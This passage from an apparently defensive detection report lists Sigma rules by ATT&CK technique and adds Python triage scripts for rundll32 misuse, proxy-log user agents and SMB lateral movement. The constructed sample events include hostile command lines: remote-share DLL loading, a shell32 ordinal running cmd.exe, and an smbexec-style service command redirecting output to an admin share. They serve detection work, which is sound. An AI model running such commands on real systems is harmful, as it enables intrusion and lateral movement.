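    if not sep and args.startswith(","):                # "foo.dll" ,Export  /  "foo.dll",Export
        export, _, args = args[1:].lstrip().partition(" ")
        args = args.strip()
    elif sep and not export:                            # foo.dll, Export
        export, _, args = args.partition(" ")
        args = args.strip()
    return dll, export, args


def triage_rundll32(record):
    """Return the heuristic names that fire for one process-creation record."""
    parsed = parse_rundll32(record["CommandLine"])
    if parsed is None:
        return []
    dll, export, args = parsed
    if not dll:
        return ["no_parameters"]                        # sacrificial process with default opsec
    hits = []
    dll_l, export_l = dll.lower(), export.lower()
    base, ext = ntpath.basename(dll_l), ntpath.splitext(dll_l)[1]
    if dll_l.startswith("\\\\"):
        hits.append("unc_path")
    if export_l.startswith("#"):
        hits.append("ordinal_export")
        if base == "shell32.dll":
            hits.append("shell32_ordinal")
    if ext in IMAGE_EXTS:
        hits.append("image_extension")
    elif ext not in COMMON_DLL_EXTS:
        hits.append("uncommon_extension")
    if export_l in {"rundll", "control_rundll"} and not args:   # line ends in ,RunDLL / ,Control_RunDLL
        hits.append("emotet_style_export")
    if export_l == "shellexec_rundll":
        hits.append("shellexec_rundll")
    if base == "shell32.dll" and export_l in {"control_rundll", "shellexec_rundll"}:
        if any(marker in args.lower() for marker in USER_WRITABLE):
            hits.append("shell32_launch_from_user_dir")
    return hits


def scan(records):
    """Return (command line, hits) for every record that fires at least one heuristic."""
    results = []
    for rec in records:
        hits = triage_rundll32(rec)
        if hits:
            results.append((rec["CommandLine"], hits))
    return results


SAMPLE_EVENTS = [  # constructed process-creation records, not real telemetry
    {"CommandLine": r"rundll32.exe"},
    {"CommandLine": r"rundll32.exe \\10.0.0.5\share\payload.dll,#1"},
    {"CommandLine": r'rundll32.exe "C:\Users\bob\Pictures\photo.png",DllRegisterServer'},
    {"CommandLine": r"rundll32.exe C:\Users\bob\AppData\Local\Temp\x.tmp,RunDLL"},
    {"CommandLine": r'rundll32.exe shell32.dll,Control_RunDLL "C:\Users\bob\AppData\Local\Temp\a.cpl"'},
    {"CommandLine": r'rundll32.exe C:\Windows\System32\shell32.dll,#568 "cmd.exe" /c whoami'},  # ordinal is a placeholder
    {"CommandLine": r"rundll32.exe shell32.dll,ShellExec_RunDLL notepad.exe"},
    {"CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl"},      # benign control panel launch
    {"CommandLine": r"C:\Windows\System32\cmd.exe /c whoami"},                    # not rundll32 at all
]

if __name__ == "__main__":
    for cmdline, hits in scan(SAMPLE_EVENTS):
        print(f"{', '.join(hits):45s} {cmdline}")
```

The parser deliberately tolerates the comma placements rundll32 itself accepts (`a.dll,Export`, `"a.dll",Export`, `a.dll, Export`), because the Emotet and ordinal rules above key on exactly that token boundary; a detection that only string-matches ",RunDLL" at end of line misses the spaced variants.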
attack.t1071.001 42
  • CobaltStrike Malleable Amazon Browsing Traffic Profile - Level: high
    Description: Detects Malleable Amazon Profile
  • CobaltStrike Malformed UAs in Malleable Profiles - Level: critical
    Description: Detects different malformed user agents used in Malleable Profiles used with Cobalt Strike
  • CobaltStrike Malleable (OCSP) Profile - Level: high
    Description: Detects Malleable (OCSP) Profile with Typo (OSCP) in URL
  • CobaltStrike Malleable OneDrive Browsing Traffic Profile - Level: high
    Description: Detects Malleable OneDrive Profile
  • Suspicious Curl Change User Agents - Linux - Level: medium
    Description: Detects a suspicious curl process start on Linux with a user-agent option set
  • Suspicious Installer Package Child Process - Level: medium
    Description: Detects the execution of suspicious child processes from macOS installer package parent process. This includes osascript, JXA, curl and wget amongst other interpreters
  • Wannacry Killswitch Domain - Level: high
    Description: Detects DNS queries for the WannaCry killswitch domain
  • Windows WebDAV User Agent - Level: high
    Description: Detects the Windows WebDAV user agent as seen in a WebDAV download cradle
  • HackTool - CobaltStrike Malleable Profile Patterns - Proxy - Level: high
    Description: Detects cobalt strike malleable profiles patterns (URI, User-Agents, Methods).
  • HackTool - BabyShark Agent Default URL Pattern - Level: critical
    Description: Detects Baby Shark C2 Framework default communication patterns
  • HackTool - Empire UserAgent URI Combo - Level: high
    Description: Detects user agent and URI paths used by empire agents
  • PwnDrp Access - Level: critical
    Description: Detects downloads from PwnDrp web servers developed for red team testing and most likely also used for criminal activity
  • Raw Paste Service Access - Level: high
    Description: Detects direct access to raw pastes in different paste services often used by malware in their second stages to download malicious code in encrypted or encoded form
  • Telegram API Access - Level: medium
    Description: Detects suspicious requests to Telegram API without the usual Telegram User-Agent
  • APT User Agent - Level: high
    Description: Detects suspicious user agent strings used in APT malware in proxy logs
  • Suspicious Base64 Encoded User-Agent - Level: medium
    Description: Detects suspicious encoded User-Agent strings, as seen used by some malware.
  • Bitsadmin to Uncommon IP Server Address - Level: high
    Description: Detects Bitsadmin connections to IP addresses instead of FQDN names
  • Bitsadmin to Uncommon TLD - Level: high
    Description: Detects Bitsadmin connections to domains with uncommon TLDs
  • Crypto Miner User Agent - Level: high
    Description: Detects suspicious user agent strings used by crypto miners in proxy logs
  • HTTP Request With Empty User Agent - Level: medium
    Description: Detects a potentially suspicious empty user agent string in proxy logs. Could potentially indicate an uncommon request method.
  • Exploit Framework User Agent - Level: high
    Description: Detects suspicious user agent strings used by exploit / pentest frameworks like Metasploit in proxy logs
  • Malware User Agent - Level: high
    Description: Detects suspicious user agent strings used by malware in proxy logs
  • Windows PowerShell User Agent - Level: medium
    Description: Detects Windows PowerShell Web Access
  • Suspicious User Agent - Level: high
    Description: Detects suspicious malformed user agent strings in proxy logs
  • Potential Base64 Encoded User-Agent - Level: medium
    Description: Detects User Agent strings that end with an equal sign, which can be a sign of base64 encoding.
  • Cloudflared Tunnels Related DNS Requests - Level: medium
    Description: Detects DNS requests to Cloudflared tunnels domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
  • DNS Query To Devtunnels Domain - Level: medium
    Description: Detects DNS query requests to Devtunnels domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
  • DNS Query Request By QuickAssist.EXE - Level: low
    Description: Detects DNS queries initiated by "QuickAssist.exe" to Microsoft Quick Assist primary endpoint that is used to establish a session.
  • DNS Query To Visual Studio Code Tunnels Domain - Level: medium
    Description: Detects DNS query requests to Visual Studio Code tunnel domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
  • Outbound Network Connection Initiated By Microsoft Dialer - Level: high
    Description: Detects an outbound network connection initiated by Microsoft Dialer. The Microsoft Dialer, also known as Phone Dialer, is a built-in utility application included in various versions of the Microsoft Windows operating system. Its primary function is to provide users with a graphical interface for managing phone calls via a modem or a phone line connected to the computer. In current usage this process is outdated, and it is a common target for info stealers for process injection and for making C2 connections; a common example is "Rhadamanthys".
  • Change User Agents with WebRequest - Level: medium
    Description: Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
  • Visual Studio Code Tunnel Execution - Level: medium
    Description: Detects Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel
  • Visual Studio Code Tunnel Shell Execution - Level: medium
    Description: Detects the execution of a shell (powershell, bash, wsl...) via Visual Studio Code tunnel. Attackers can abuse this functionality to establish a C2 channel and execute arbitrary commands on the system.
  • Renamed Visual Studio Code Tunnel Execution - Level: high
    Description: Detects renamed Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel
  • Visual Studio Code Tunnel Service Installation - Level: medium
    Description: Detects the installation of VsCode tunnel (code-tunnel) as a service.
  • Chafer Malware URL Pattern - Level: high
    Description: Detects HTTP request used by Chafer malware to receive data from its C2.
  • Ursnif Malware C2 URL Pattern - Level: critical
    Description: Detects Ursnif C2 traffic.
  • Ursnif Malware Download URL Pattern - Level: high
    Description: Detects download of Ursnif malware done by dropper documents.
  • APT40 Dropbox Tool User Agent - Level: high
    Description: Detects suspicious user agent string of APT40 Dropbox tool
  • ComRAT Network Communication - Level: high
    Description: Detects Turla ComRAT network communication.
  • Curl.EXE Execution With Custom UserAgent - Level: medium
    Description: Detects execution of curl.exe with custom useragent options
  • Tunneling Tool Execution - Level: medium
    Description: Detects the execution of well known tools that can be abused for data exfiltration and tunneling.
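
Most of the proxy-log rules in this group are user-agent or URL pattern checks: an empty user agent, a user agent that is really a base64 blob (ending in "="), a malformed "Mozilla/" string with no platform token, Telegram API access without the usual Telegram client user agent, and direct fetches of raw pastes. The following Python is an added example, not code from this report or from the Sigma project: it parses a constructed tab-separated proxy log and applies those checks. The log format, the field names, the sample lines (including the bot token placeholder) and the starter list of raw-paste URL prefixes are all constructed for the example and would be replaced by the environment's own proxy schema and lists.

```python
"""Proxy-log user-agent / URL triage (added example; not from the report or Sigma).

Heuristic names returned:
  empty_user_agent, base64_user_agent, malformed_user_agent,
  telegram_api_without_client_ua, raw_paste_access
Log format and sample lines are constructed for this example.
"""
import base64
import binascii
import re
from urllib.parse import urlsplit

RAW_PASTE_PREFIXES = ("pastebin.com/raw/", "paste.ee/r/")  # starter list (host + path prefix)
B64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")


def looks_base64(text):
    """True if text is a well-formed base64 blob of at least 8 characters."""
    if len(text) < 8 or len(text) % 4 or not B64_RE.fullmatch(text):
        return False
    try:
        base64.b64decode(text, validate=True)
    except (binascii.Error, ValueError):
        return False
    return True


def parse_proxy_line(line):
    """Parse one constructed line: ts<TAB>client<TAB>method<TAB>url<TAB>status<TAB>user_agent."""
    ts, client, method, url, status, ua = line.rstrip("\n").split("\t", 5)
    return {"ts": ts, "client": client, "method": method, "url": url,
            "status": int(status), "user_agent": "" if ua == "-" else ua}


def triage_request(rec):
    """Return the heuristic names that fire for one proxy record."""
    hits = []
    ua = rec["user_agent"].strip()
    parts = urlsplit(rec["url"])
    host = (parts.hostname or "").lower()
    if not ua:
        hits.append("empty_user_agent")
    else:
        if ua.endswith("=") and looks_base64(ua):
            hits.append("base64_user_agent")
        if ua.lower().startswith("mozilla/") and "(" not in ua:   # no "(platform; ...)" token
            hits.append("malformed_user_agent")
    if host == "api.telegram.org" and "telegram" not in ua.lower():
        hits.append("telegram_api_without_client_ua")
    if any((host + parts.path).startswith(p) for p in RAW_PASTE_PREFIXES):
        hits.append("raw_paste_access")
    return hits


def scan_proxy_log(lines):
    """Return (url, hits) for every line that fires at least one heuristic."""
    results = []
    for rec in map(parse_proxy_line, lines):
        hits = triage_request(rec)
        if hits:
            results.append((rec["url"], hits))
    return results


SAMPLE_LOG = [  # constructed lines; 203.0.113.0/24 is a documentation range
    "2024-05-01T10:00:00Z\t10.0.0.21\tGET\thttps://www.example.com/\t200\t"
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0 Safari/537.36",
    "2024-05-01T10:00:05Z\t10.0.0.21\tPOST\thttp://203.0.113.10/gate.php\t200\t-",
    "2024-05-01T10:00:09Z\t10.0.0.21\tGET\thttp://203.0.113.10/cfg\t200\tSGVsbG8gV29ybGQ=",
    "2024-05-01T10:00:12Z\t10.0.0.21\tPOST\thttps://api.telegram.org/bot000000:AA/sendMessage\t200\tMozilla/4.0",
    "2024-05-01T10:00:20Z\t10.0.0.21\tGET\thttps://pastebin.com/raw/abcd1234\t200\tpython-requests/2.31.0",
    "2024-05-01T10:00:25Z\t10.0.0.22\tPOST\thttps://api.telegram.org/bot000000:AA/getUpdates\t200\tTelegramDesktop/4.8",
]

if __name__ == "__main__":
    for url, hits in scan_proxy_log(SAMPLE_LOG):
        print(f"{', '.join(hits):45s} {url}")
```

The base64 check requires the whole user agent to be a single well-formed blob rather than merely ending in "=", which is what keeps legitimate agents that happen to contain "=" in a query-like token out of the hit list; in production the raw-paste prefix list and the "Telegram client" filter are the two parts that need tuning per environment.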
attack.t1021.002 41
  • PsExec Pipes Artifacts - Level: medium
    Description: Detects use of PsExec via named pipe creation or access
  • DCOM InternetExplorer.Application Iertutil DLL Hijack - Sysmon - Level: critical
    Description: Detects a threat actor creating a file named `iertutil.dll` in the `C:\Program Files\Internet Explorer\` directory over the network and loading it for a DCOM InternetExplorer DLL Hijack scenario.
  • SMB Spoolss Name Piped Usage - Level: medium
    Description: Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.
  • First Time Seen Remote Named Pipe - Zeek - Level: high
    Description: This detection excludes known named pipes accessible remotely and notifies on newly observed ones; it may help to detect lateral movement and remote execution using named pipes
  • Suspicious PsExec Execution - Zeek - Level: high
    Description: Detects execution of PsExec or PAExec with a renamed service name. This rule helps to filter out the noise if PsExec is used for legitimate purposes or if the attacker uses a PsExec client other than the Sysinternals one
  • Access To ADMIN$ Network Share - Level: low
    Description: Detects access to ADMIN$ network share
  • CobaltStrike Service Installations - Security - Level: high
    Description: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or performs lateral movement
  • DCERPC SMB Spoolss Named Pipe - Level: medium
    Description: Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.
  • DCOM InternetExplorer.Application Iertutil DLL Hijack - Security - Level: high
    Description: Detects a threat actor creating a file named `iertutil.dll` in the `C:\Program Files\Internet Explorer\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario.
  • Impacket PsExec Execution - Level: high
    Description: Detects execution of Impacket's psexec.py.
  • First Time Seen Remote Named Pipe - Level: high
    Description: This detection excludes known named pipes accessible remotely and notifies on newly observed ones; it may help to detect lateral movement and remote execution using named pipes
  • Metasploit SMB Authentication - Level: high
    Description: Alerts on Metasploit host's authentications on the domain.
  • Metasploit Or Impacket Service Installation Via SMB PsExec - Level: high
    Description: Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation
  • Protected Storage Service Access - Level: high
    Description: Detects access to a protected_storage service over the network. Potential abuse of DPAPI to extract domain backup keys from Domain Controllers
  • SMB Create Remote File Admin Share - Level: high
    Description: Looks for non-system accounts accessing a file over SMB with a write (0x2) access mask via an administrative share (e.g. C$).
  • Suspicious PsExec Execution - Level: high
    Description: Detects execution of PsExec or PAExec with a renamed service name. This rule helps to filter out the noise if PsExec is used for legitimate purposes or if the attacker uses a PsExec client other than the Sysinternals one
  • Remote Service Activity via SVCCTL Named Pipe - Level: medium
    Description: Detects remote service activity via remote access to the svcctl named pipe
  • T1047 Wmiprvse Wbemcomn DLL Hijack - Level: high
    Description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network for a WMI DLL Hijack scenario.
  • CobaltStrike Service Installations - System - Level: critical
    Description: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or performs lateral movement
  • smbexec.py Service Installation - Level: high
    Description: Detects the use of smbexec.py tool by detecting a specific service installation
  • Potential DCOM InternetExplorer.Application DLL Hijack - Level: critical
    Description: Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class over the network
  • Wmiprvse Wbemcomn DLL Hijack - File - Level: critical
    Description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario.
  • Potential DCOM InternetExplorer.Application DLL Hijack - Image Load - Level: critical
    Description: Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class
  • Wmiprvse Wbemcomn DLL Hijack - Level: high
    Description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario.
  • PUA - CSExec Default Named Pipe - Level: medium
    Description: Detects default CSExec pipe creation
  • PUA - RemCom Default Named Pipe - Level: medium
    Description: Detects default RemCom pipe creation
  • Suspicious New-PSDrive to Admin Share - Level: medium
    Description: Adversaries may interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.
  • HackTool - SharpMove Tool Execution - Level: high
    Description: Detects the execution of SharpMove, a .NET utility performing multiple tasks such as "Task Creation", "SCM" query, VBScript execution using WMI via its PE metadata and command line options.
  • Windows Admin Share Mount Via Net.EXE - Level: medium
    Description: Detects when an admin share is mounted using net.exe
  • Password Provided In Command Line Of Net.EXE - Level: medium
    Description: Detects when net.exe is called with a password in the command line
  • Windows Internet Hosted WebDav Share Mount Via Net.EXE - Level: high
    Description: Detects when an internet hosted webdav share is mounted using the "net.exe" utility
  • Windows Share Mount Via Net.EXE - Level: low
    Description: Detects when a share is mounted using the "net.exe" utility
  • Rundll32 UNC Path Execution - Level: high
    Description: Detects rundll32 execution where the DLL is located on a remote location (share)
  • Rundll32 Execution Without Parameters - Level: high
    Description: Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module
  • Copy From Or To Admin Share Or Sysvol Folder - Level: medium
    Description: Detects a copy command or a copy utility execution to or from an Admin share or a remote system
  • Potential CobaltStrike Service Installations - Registry - Level: high
    Description: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or performs lateral movement.
  • Turla Group Lateral Movement - Level: critical
    Description: Detects automated lateral movement by Turla group
  • Net.EXE Execution - Level: low
    Description: Detects execution of "Net.EXE".
  • Automated Turla Group Lateral Movement - Level: medium
    Description: Detects automated lateral movement by Turla group
  • Metasploit Or Impacket Service Installation Via SMB PsExec - Level: high
    Description: Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation
  • Failed Mounting of Hidden Share - Level: medium
    Description: Detects repeated failed (outgoing) attempts to mount a hidden share
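
The SMB lateral-movement rules in this group key on three telemetry sources: Security 5145 share-access events (ADMIN$ access, write access to an admin share by a non-machine account, svcctl and spoolss pipe access over IPC$, and named pipes never seen before against a baseline), Sysmon pipe-creation events (the default PsExec pipe), and System 7045 service installations (the default PsExec service, and the echo-to-__output / execute.bat batch command that smbexec.py installs as a service image path). The following Python is an added example, not code from this report or from the Sigma project: it keeps a running baseline of observed remote pipes and applies those checks to constructed events. The event field names are simplified stand-ins for the real per-source field names, and the baseline pipe list, subjects and hosts are constructed.

```python
"""SMB / named-pipe / service-install lateral-movement triage (added example;
not from the report or Sigma).

Heuristic names returned:
  admin_share_access, admin_share_file_write, svcctl_remote_service,
  spoolss_pipe, first_seen_remote_pipe, psexec_default_pipe,
  psexec_service, smbexec_style_service
Event field names are simplified and the sample events are constructed.
"""

KNOWN_REMOTE_PIPES = {"srvsvc", "wkssvc", "samr", "lsarpc", "netlogon"}  # constructed baseline


class LateralMovementTriage:
    def __init__(self, known_pipes=KNOWN_REMOTE_PIPES):
        # pipes already accepted as normal; grows as new ones are observed (and alerted on once)
        self.seen_pipes = {p.lower() for p in known_pipes}

    def handle(self, ev):
        """Return the heuristic names that fire for one event."""
        hits = []
        source, eid = ev["source"], ev["event_id"]
        if source == "security" and eid == 5145:                     # network share object checked
            share = ev["share_name"].rsplit("\\", 1)[-1].upper()      # "\\*\ADMIN$" -> "ADMIN$"
            target = ev["relative_target"].lower()
            if share == "ADMIN$":
                hits.append("admin_share_access")
            if share == "IPC$":                                       # named pipes are reached via IPC$
                if target == "svcctl":
                    hits.append("svcctl_remote_service")
                if target == "spoolss":
                    hits.append("spoolss_pipe")
                if target not in self.seen_pipes:
                    self.seen_pipes.add(target)
                    hits.append("first_seen_remote_pipe")
            # write (0x2) to C$/ADMIN$ by something other than a machine account (name ends in $)
            if share in {"ADMIN$", "C$"} and ev["access_mask"] & 0x2 and not ev["subject"].endswith("$"):
                hits.append("admin_share_file_write")
        elif source == "sysmon" and eid == 17:                       # pipe created
            if ev["pipe_name"].lower().lstrip("\\") == "psexesvc":
                hits.append("psexec_default_pipe")
        elif source == "system" and eid == 7045:                     # service installed
            image = ev["image_path"].lower()
            if ev["service_name"].upper() == "PSEXESVC":
                hits.append("psexec_service")
            if "__output" in image and "execute.bat" in image:
                hits.append("smbexec_style_service")
        return hits


def run(events, known_pipes=KNOWN_REMOTE_PIPES):
    """Process events in order; return (index, hits) for those that fire."""
    triage = LateralMovementTriage(known_pipes)
    results = []
    for i, ev in enumerate(events):
        hits = triage.handle(ev)
        if hits:
            results.append((i, hits))
    return results


SAMPLE_EVENTS = [  # constructed events; subjects, hosts and paths are made up
    {"source": "security", "event_id": 5145, "subject": "CORP\\alice", "share_name": "\\\\*\\IPC$",
     "relative_target": "srvsvc", "access_mask": 0x12019F},
    {"source": "security", "event_id": 5145, "subject": "CORP\\alice", "share_name": "\\\\*\\IPC$",
     "relative_target": "svcctl", "access_mask": 0x12019F},
    {"source": "security", "event_id": 5145, "subject": "CORP\\alice", "share_name": "\\\\*\\ADMIN$",
     "relative_target": "PSEXESVC.exe", "access_mask": 0x2},
    {"source": "sysmon", "event_id": 17, "image": "C:\\Windows\\PSEXESVC.exe", "pipe_name": "\\PSEXESVC"},
    {"source": "system", "event_id": 7045, "service_name": "PSEXESVC", "image_path": "%SystemRoot%\\PSEXESVC.exe"},
    {"source": "system", "event_id": 7045, "service_name": "BTOBTO",
     "image_path": "%COMSPEC% /Q /c echo whoami ^> \\\\127.0.0.1\\C$\\__output 2^>^&1 > %TEMP%\\execute.bat "
                   "& %COMSPEC% /Q /c %TEMP%\\execute.bat & del %TEMP%\\execute.bat"},
    {"source": "security", "event_id": 5145, "subject": "CORP\\alice", "share_name": "\\\\*\\IPC$",
     "relative_target": "svcctl", "access_mask": 0x12019F},
    {"source": "security", "event_id": 5145, "subject": "CORP\\bob", "share_name": "\\\\*\\IPC$",
     "relative_target": "spoolss", "access_mask": 0x12019F},
]

if __name__ == "__main__":
    for i, hits in run(SAMPLE_EVENTS):
        print(f"event {i}: {', '.join(hits)}")
```

The first-seen check is stateful on purpose: the second svcctl access in the sample fires only the svcctl heuristic, which is the behaviour the "First Time Seen Remote Named Pipe" rules describe. In a real pipeline the baseline would be persisted per host or per environment rather than held in memory, and seeded from a learning period rather than a hand-written set.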
attack.t1078.004 38
  • AWS SAML Provider Deletion Activity - Level: medium
    Description: Detects the deletion of an AWS SAML provider, potentially indicating malicious intent to disrupt administrative or security team access. An attacker can remove the SAML provider for the information security team or a team of system administrators, to make it difficult for them to work and investigate at the time of the attack and after it.
  • AWS IAM S3Browser Templated S3 Bucket Policy Creation - Level: high
    Description: Detects S3 browser utility creating Inline IAM policy containing default S3 bucket name placeholder value of "".
  • AWS IAM S3Browser LoginProfile Creation - Level: high
    Description: Detects S3 Browser utility performing reconnaissance looking for existing IAM Users without a LoginProfile defined then (when found) creating a LoginProfile.
  • AWS IAM S3Browser User or AccessKey Creation - Level: high
    Description: Detects S3 Browser utility creating IAM User or AccessKey.
  • AWS Root Credentials - Level: medium
    Description: Detects AWS root account usage
  • Azure Subscription Permission Elevation Via ActivityLogs - Level: high
    Description: Detects when a user has been elevated to manage all Azure Subscriptions. This change should be investigated immediately if it isn't planned. This setting could allow an attacker access to Azure subscriptions in your environment.
  • Bitlocker Key Retrieval - Level: medium
    Description: Monitor and alert for Bitlocker key retrieval.
  • Users Added to Global or Device Admin Roles - Level: high
    Description: Monitor and alert for users added to device admin roles.
  • Application AppID Uri Configuration Changes - Level: high
    Description: Detects when a configuration change is made to an applications AppID URI.
  • Application URI Configuration Changes - Level: high
    Description: Detects when a configuration change is made to an application's URI. URIs for domain names that no longer exist (dangling URIs), URIs not using HTTPS, wildcards at the end of the domain, URIs that are not unique to that app, or URIs that point to domains you do not control should be investigated.
  • Guest User Invited By Non Approved Inviters - Level: medium
    Description: Detects when a user that doesn't have permissions to invite a guest user attempts to invite one.
  • User State Changed From Guest To Member - Level: medium
    Description: Detects the change of user type from "Guest" to "Member" for potential elevation of privilege.
  • PIM Approvals And Deny Elevation - Level: high
    Description: Detects when a PIM elevation is approved or denied. Outside of normal operations should be investigated.
  • Changes To PIM Settings - Level: high
    Description: Detects when changes are made to PIM roles
  • User Added To Privilege Role - Level: high
    Description: Detects when a user is added to a privileged role.
  • Privileged Account Creation - Level: medium
    Description: Detects when a new admin is created.
  • Temporary Access Pass Added To An Account - Level: high
    Description: Detects when a temporary access pass (TAP) is added to an account. TAPs added to priv accounts should be investigated
  • Password Reset By User Account - Level: medium
    Description: Detect when a user has reset their password in Azure AD
  • Successful Authentications From Countries You Do Not Operate Out Of - Level: medium
    Description: Detect successful authentications from countries you do not operate out of.
  • Failed Authentications From Countries You Do Not Operate Out Of - Level: low
    Description: Detect failed authentications from countries you do not operate out of.
  • Device Registration or Join Without MFA - Level: medium
    Description: Monitor and alert for device registration or join events where MFA was not performed.
  • Azure AD Only Single Factor Authentication Required - Level: low
    Description: Detect when users are authenticating without MFA being required.
  • Sign-ins from Non-Compliant Devices - Level: high
    Description: Monitor and alert for sign-ins where the device was non-compliant.
  • Sign-ins by Unknown Devices - Level: low
    Description: Monitor and alert for Sign-ins by unknown devices from non-Trusted locations.
  • Potential MFA Bypass Using Legacy Client Authentication - Level: high
    Description: Detects successful authentication from potential clients using legacy authentication via user agent strings. This could be a sign of MFA bypass using a password spray attack.
  • Account Disabled or Blocked for Sign in Attempts - Level: medium
    Description: Detects when an account is disabled or blocked for sign in but tried to log in
  • Sign-in Failure Due to Conditional Access Requirements Not Met - Level: high
    Description: Define a baseline threshold for failed sign-ins due to Conditional Access failures
  • Use of Legacy Authentication Protocols - Level: high
    Description: Alert on when legacy authentication has been used on an account
  • Login to Disabled Account - Level: medium
    Description: Detect failed attempts to sign in to disabled accounts.
  • Multifactor Authentication Denied - Level: medium
    Description: User has indicated they haven't instigated the MFA prompt and could indicate an attacker has the password for the account.
  • Multifactor Authentication Interrupted - Level: medium
    Description: Identifies user login with multifactor authentication failures, which might be an indication an attacker has the password for the account but can't pass the MFA challenge.
  • Users Authenticating To Other Azure AD Tenants - Level: medium
    Description: Detect when users in your Azure AD tenant are authenticating to other Azure AD Tenants.
  • User Access Blocked by Azure Conditional Access - Level: medium
    Description: Detects access that has been blocked by Conditional Access policies. The access policy does not allow token issuance, which might be a sign of unauthorized login to valid accounts.
  • Bitbucket User Login Failure - Level: medium
    Description: Detects user authentication failure events. Please note that this rule can be noisy and it is recommended to use with correlation based on "author.name" field.
  • Github New Secret Created - Level: low
    Description: Detects when a user creates action secret for the organization, environment, codespaces or repository.
  • Github Self Hosted Runner Changes Detected - Level: low
    Description: A self-hosted runner is a system that you deploy and manage to execute jobs from GitHub Actions on GitHub.com. This rule detects changes to self-hosted runner configurations in the environment. Once detected, such changes should be validated from the GitHub UI because the log entry may not provide full context.
  • Github SSH Certificate Configuration Changed - Level: medium
    Description: Detects when changes are made to the SSH certificate configuration of the organization.
  • Okta New Admin Console Behaviours - Level: high
    Description: Detects when Okta identifies new activity in the Admin Console.
attack.t1204.002 37
  • New Lolbin Process by Office Applications - Level: high
    Description: This rule will monitor any Office app that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated.
  • Excel Proxy Executing Regsvr32 With Payload - Level: high
    Description: Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break the suspicious parent-child chain (Office app spawns LOLBin). But we have the command line in the event, which allows us to "restore" this suspicious parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in the command line with parent Office application processes.
  • Excel Proxy Executing Regsvr32 With Payload Alternate - Level: high
    Description: Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break the suspicious parent-child chain (Office app spawns LOLBin). But we have the command line in the event, which allows us to "restore" this suspicious parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in the command line with parent Office application processes.
  • Office Applications Spawning Wmi Cli Alternate - Level: high
    Description: Initial execution of a malicious document calls wmic to execute the file with regsvr32
  • WMI Execution Via Office Process - Level: medium
    Description: Initial execution of a malicious document calls wmic to execute the file with regsvr32
  • Suspicious Microsoft Office Child Process - MacOS - Level: high
    Description: Detects suspicious child processes spawning from Microsoft Office suite applications such as Word or Excel. This could indicate malicious macro execution
  • Download From Suspicious TLD - Blacklist - Level: low
    Description: Detects download of certain file types from hosts in suspicious TLDs
  • Download From Suspicious TLD - Whitelist - Level: low
    Description: Detects executable downloads from suspicious remote systems
  • Flash Player Update from Suspicious Location - Level: high
    Description: Detects a flashplayer update from an unofficial location
  • File Was Not Allowed To Run - Level: medium
    Description: Detects files that were not allowed to run. AppLocker is a very useful tool, especially on servers where unprivileged users have access, for example terminal servers. You need to configure AppLocker and log collection to receive these events.
  • File With Uncommon Extension Created By An Office Application - Level: high
    Description: Detects the creation of files with an executable or script extension by an Office application.
  • CLR DLL Loaded Via Office Applications - Level: medium
    Description: Detects CLR DLL being loaded by an Office Product
  • DotNET Assembly DLL Loaded Via Office Application - Level: medium
    Description: Detects any assembly DLL being loaded by an Office Product
  • Active Directory Parsing DLL Loaded Via Office Application - Level: medium
    Description: Detects DSParse DLL being loaded by an Office Product
  • GAC DLL Loaded Via Office Applications - Level: high
    Description: Detects any GAC DLL being loaded by an Office Product
  • Microsoft Excel Add-In Loaded From Uncommon Location - Level: medium
    Description: Detects Microsoft Excel loading an Add-In (.xll) file from an uncommon location
  • Active Directory Kerberos DLL Loaded Via Office Application - Level: medium
    Description: Detects Kerberos DLL being loaded by an Office Product
  • Microsoft VBA For Outlook Addin Loaded Via Outlook - Level: medium
    Description: Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process
  • VBA DLL Loaded Via Office Application - Level: high
    Description: Detects VB DLLs loaded by an Office application, which could indicate the presence of VBA macros.
  • Remote DLL Load Via Rundll32.EXE - Level: medium
    Description: Detects a remote DLL load event via "rundll32.exe".
  • HackTool - LittleCorporal Generated Maldoc Injection - Level: high
    Description: Detects the process injection of a LittleCorporal generated Maldoc.
  • Suspicious Outlook Child Process - Level: high
    Description: Detects a suspicious process spawning from an Outlook process.
  • Suspicious Binary In User Directory Spawned From Office Application - Level: high
    Description: Detects an executable in the user's directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)
